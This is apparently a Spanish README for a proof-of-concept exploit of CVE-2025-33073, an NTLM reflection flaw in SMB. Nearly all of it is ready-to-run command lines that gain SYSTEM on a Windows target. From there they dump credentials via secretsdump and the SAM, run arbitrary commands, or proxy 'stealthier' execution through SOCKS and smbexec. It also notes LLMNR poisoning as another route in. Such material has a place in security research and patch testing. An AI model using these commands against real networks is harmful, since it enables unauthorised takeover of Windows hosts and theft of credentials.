
PoC Exploit para la vulnerabilidad de reflexión NTLM en SMB.
PoC Exploit para la vulnerabilidad de reflexión NTLM en SMB.
Todo el crédito va para la investigación oficial:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
SO: Kali Linux (tiene la mayoría de los paquetes preinstalados).
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Comando personalizado
En lugar de ejecutar secretsdump, se puede ejecutar un comando personalizado.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
Para una ejecución de comandos más sigilosa después de haber establecido una conexión válida como SYSTEM. --target y --target-ip deben ser iguales aquí.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
También se puede ejecutar un comando personalizado a través de proxychains en lugar de volcar el SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Si estás en el mismo dominio de difusión que el dispositivo y es vulnerable al envenenamiento LLMNR, es posible explotar un dispositivo sin tener que registrar un registro DNS.

La autenticación NTLM local tiene lugar

La autenticación NTLM local no tiene lugar, resultando en un intento FAILED
